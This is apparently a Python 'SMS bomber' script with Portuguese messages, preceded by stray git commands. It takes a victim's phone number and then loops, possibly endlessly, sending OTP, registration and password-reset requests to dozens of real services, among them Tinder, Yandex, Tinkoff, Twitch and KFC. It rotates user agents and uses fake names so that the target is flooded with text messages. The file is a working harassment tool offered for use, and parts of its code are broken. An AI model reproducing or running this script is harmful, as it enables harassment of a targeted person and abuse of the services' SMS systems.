echo "# quantim" >> README.md 
git init 
git add README.md 
git commit -m "first commit" 
git branch -M main 
git remote add origin https://github.com/babaluulm/quantim.git
 git push - sua origem principal
 
 import sys
try:
    import random, datetime, argparse, os
    from time import sleep
except ImportError:
    print('Erro, verifique se o Python 3 está instalado no seu computador.')
    sys.exit(1)
try:
    import requests
except ImportError:
    print('Não foi possível importar.')
    print('Digite "pip install requests" para corrigir os erros.')
    sys.exit(1)


heads = [
    {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:76.0) Gecko/20100101 Firefox/76.0',
    'Accept': '*/*'
    },
    {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0",
    'Accept': '*/*'
    },
    {
    "User-Agent": "Mozilla/5.0 (X11; Debian; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0",
    'Accept': '*/*'
    },
    {
    'User-Agent': 'Mozilla/5.0 (Windows NT 3.1; rv:76.0) Gecko/20100101 Firefox/69.0',
    'Accept': '*/*'
    },
    {
    "User-Agent": "Mozilla/5.0 (X11; Debian; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/76.0",
    'Accept': '*/*'
    },
]

def Logo():
    global phone
    global name
    global iteration
    print(banner)
    iteration = 0
    name = ''
    phone = input('Número da pessoa:  ')
    count = int(input('Número de ciclos(0 - 999):  '))
    print('Use esse serviço apenas para testes, não faça nada estúpido.')
    
    if count == 0:
        while True:
            bombing()
            iteration += 1
            print(iteration, ' círculo completo. ')


    else:
        for i in range(count):
            bombing()
            iteration += 1
            print(iteration, ' círculo completo. ')
        print('spam encerrado')
        input('Aperte "Enter", para deixar...')




        
def bombing():
    HEADERS = random.choice(heads)
    global phone
    global name
    global iteration
    if phone[0] == '+':
        phone = phone[1:]
    if phone[0] == '8':
        phone = '7' + phone[1:]
    if phone[0] == '9':
        phone = '7' + phone
    for x in range(12):
        name = name + random.choice(list('1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
        password = name + random.choice(list('1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
        username = name + random.choice(list('1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))

    phone9 = phone[1:]
    phone_plus = '+' + phone
    phone8 = '8' + phone[1:]
    email = name+f'{iteration}'+'@gmail.com'
    email = name+f'{iteration}'+'@gmail.com'
    try:
        requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': phone}, headers=HEADERS)
        print('SunLight: enviado')
    except:
        print('SunLight: não enviado')

    try:
        requests.post('https://cloud.mail.ru/api/v2/notify/applink',json = {"phone": phone_plus, "api": 2, "email": "email","x-email": "x-email"}, headers=HEADERS)
        print('iCloud: enviado')
    except:
        print('iCloud: não enviado')

    try:
    	requests.post('https://b.utair.ru/api/v1/login/', data = {'login':phone8}, headers=HEADERS)
        print('Utair: enviado')
    except:
        print('Utair: não enviado')

    try:
        requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data = {"phone_number":phone}, headers=HEADERS)
        print('Tinder: enviado')
    except:
        print('Tinder: não enviado')

    try:
        requests.post("https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone", data = {"st.r.phone": phone_plus}, headers=HEADERS)
        print('Одноклассники: enviado')
    except:
        print('Одноклассники: não enviado')

    try:
    	requests.post('https://app.karusel.ru/api/v1/phone/', data = {"phone":phone}, headers=HEADERS)
    	print('Карусель: enviado')
    except:
        print('Карусель: não enviado')

    try:
        requests.post('https://youdrive.today/login/web/phone', data = {'phone': phone9, 'phone_code': '7'},headers=HEADERS)
        print('YouDrive: enviado')
    except:
        print('YouDrive: não enviado')

    try:
    	requests.post('https://api.mtstv.ru/v1/users', json={'msisdn': phone}, headers=HEADERS)
    	print('MTS TV: enviado')
    except:
        print('MTS TV: não enviado')

    try:
    	requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":phone_plus}, headers=HEADERS)
    	print('Юла: enviado')
    except:
        print('Юла: não enviado')

    try:
        requests.post('https://eda.yandex/api/v1/user/request_authentication_code',json={"phone_number": "+" + phone}, headers=HEADERS)
        print('Яндекс.Еда: enviado')
    except:
        print('Яндекс.Еда: não enviado')

    try:
        requests.post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data= {"phone": phone}, headers=HEADERS)
        print('IVI: enviado')
    except:
        print('IVI: não enviado')

    try:
        requests.post("https://api.delitime.ru/api/v2/signup",data={"SignupForm[username]": phone, "SignupForm[device_type]": 3}, headers=HEADERS)
        print('DeliTime: enviado')
    except:
        print('DeliTime: não enviado')

    try:
        requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php',data={'msisdn': phone, "locale": 'en', 'countryCode': 'ru','version': '1', "k": "ic1rtwz1s1Hj1O0r", "r": "46763"}, headers=HEADERS)
        print('ICQ: enviado')
    except:
        print('ICQ: não enviado')

    try:
        requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber': phone,'countryCode': 'ID','name': 'test','email': 'mail@mail.com','deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})
        print('Grabaxi: enviado')
    except:
        print('GrabTaxi: não enviado')

    try:
        requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone9}).json()['res']
        print('RuTaxi: enviado')
    except:
        print('RuTaxi: não enviado')

    try:
        requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': phone_plus}, headers={})
        print('Tinkoff: enviado')
    except:
        print('Tinkoff: não enviado')

    try:
        requests.post('https://www.rabota.ru/remind', data={'credential': phone})
        print('Работа: enviado')
    except:
        print('Работа: não enviado')

    try:
        requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': phone_plus})
        print('Rutube: enviado')
    except:
        print('Rutube: não enviado')

    try:
        requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name': name,'phone': phone, 'promo': 'yellowforma'})
        print('Smsint: enviado')
    except:
        print('Smsint: não enviado')

    try:
        requests.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone9 + '&country_code=%2B7&nod=4&locale=en')
        print('Oyorooms: enviado')
    except:
        print('Oyorooms: não enviado')

    try:
        requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName': 'loginByUserPhoneVerification', 'fromCheckout': 'false','fromRegisterPage': 'true','snLogin': '','bpg': '','snProviderId': ''}, data={'phone': phone,'g-recaptcha-response': '','recaptcha': 'on'})
        print('Мвидео: отправлено')
    except:
        print('Мвидео: não enviado')

    try:
        requests.post('https://newnext.ru/graphql', json={'operationName': 'registration', 'variables': {'client': {'firstName': 'Иван', 'lastName': 'Иванов', 'phone': phone,'typeKeys': ['Unemployed']}},'query': 'mutation registration($client: ClientInput!) {''\n  registration(client: $client) {''\n    token\n    __typename\n  }\n}\n'})
        print('Newnext: enviado')
    except:
        print('Newnext: não enviado')

    try:
        requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': phone})
        print('Invitro: enviado')
    except:
        print('Invitro: não enviado')

    try:
        requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван','middleName':'Иванович','lastName':'Иванов','sex':'1','birthDate':'10.10.2000','mobilePhone': phone9,'russianFederationResident':'true','isDSA':'false','personalDataProcessingAgreement':'true','bKIRequestAgreement':'null','promotionAgreement':'true'})
        print('Psbank: enviado')
    except:
        print('PSbank: não enviado')

    try:
        requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone})
        print('Beltelcom: enviado')
    except:
        print('Beltelcom: não enviado')

    try:
        requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + phone})
        print('KFC: enviado')
    except:
        print('KFC: não enviado')

    try:
        requests.post('https://api.carsmile.com/',json={'operationName': 'enterPhone', 'variables': {'phone': phone},'query': 'mutation enterPhone($phone: String!) {\n  enterPhone(phone: $phone)\n}\n'})
        print('Carsmile: enviado')
    except:
        print('Carsmile: não enviado')

    try:
        requests.post('https://www.citilink.ru/registration/confirm/phone/+' + phone + '/')
        print('Citilink: enviado')
    except:
        print('CitiLink: não enviado')

    try:
        requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru',data={'mode': 'request', 'phone': '+' + phone,'phone_permission': 'unknown', 'stream_id': 0, 'v': 3, 'appversion': '3.20.6','osversion': 'unknown', 'devicemodel': 'unknown'})
        print('InDriver: enviado')
    except:
        print('Indriver: não enviado')

    try:
        requests.post('https://lenta.com/api/v1/authentication/requestValidationCode',json={'phone': '+' + self.formattedphone})
        print('Lenta: enviado')
    except:
        print('Lenta: não enviado')

    try:
        requests.post('https://cloud.mail.ru/api/v2/notify/applink',json={'phone': '+' + phone, 'api': 2, 'email': 'email','x-email': 'x-email'})
        print('Mail.ru: enviado')
    except:
        print('Mail.ru: não enviado')

    try:
        requests.post('https://plink.tech/register/',json={'phone': phone})
        print('Plink: enviado')
    except:
        print('Plink: não enviado')

    try:
        requests.post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",json = {"phone": phone}, headers=HEADERS)
        print('Qlean: enviado')
    except:
        print('Qlean: não enviado')

    try:
        requests.post('https://passport.twitch.tv/register?trusted_request=true',json={'birthday': {'day': 11, 'month': 11, 'year': 1999},'client_id': 'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code': True,'password': password, 'phone_number': phone,'username': username})
        print('Twitch: enviado')
    except:
        print('Twitch: não enviado')

    try:
        requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': phone})
        print('DeliveryClub: enviado')
    except:
        print('DeliveryClub: não enviado')
Logo()
